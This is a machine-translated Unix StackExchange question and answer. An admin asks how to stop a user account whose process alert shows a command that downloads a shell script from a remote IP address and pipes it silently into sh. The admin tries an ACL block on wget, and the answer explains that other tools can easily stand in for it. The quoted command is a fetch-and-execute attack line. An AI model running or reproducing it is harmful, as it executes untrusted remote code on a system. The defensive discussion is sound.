Linux

處理警報 - 停止或阻止使用者執行此操作

  • May 21, 2021

我將如何解決這個問題?我已經嘗試過如何在The Geek Diary中為 Linux 中的特定使用者禁用特定命令

User:clipdrop PID:8426 PPID:8401 Run Time:0(secs) Memory:113280(kb) RSS:1180(kb) exe:/usr/bin/bash cmd:/bin/sh -c wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

編輯#1

執行getfacl /usr/bin/wget我得到:

getfacl: Removing leading '/' from absolute path names
# file: usr/bin/wget
# owner: root
# group: root
user::rwx
user:clipdrop:---
group::r-x
mask::r-x
other::r-x

curl在 Unix/Linux 上,獲取替代工具來執行任何惡意行為(下載隨機文件、使用任何 FTP 客戶端、使用 Web 瀏覽器,甚至在 emacs 中使用 Web 瀏覽器;獲取原始碼)太容易了從控製版本系統並自己編譯;使案例如 Python、Perl,它們具有內置的大多數“典型”網路任務,或者作為或多或少標準庫的一部分)。

引用自:https://unix.stackexchange.com/questions/650784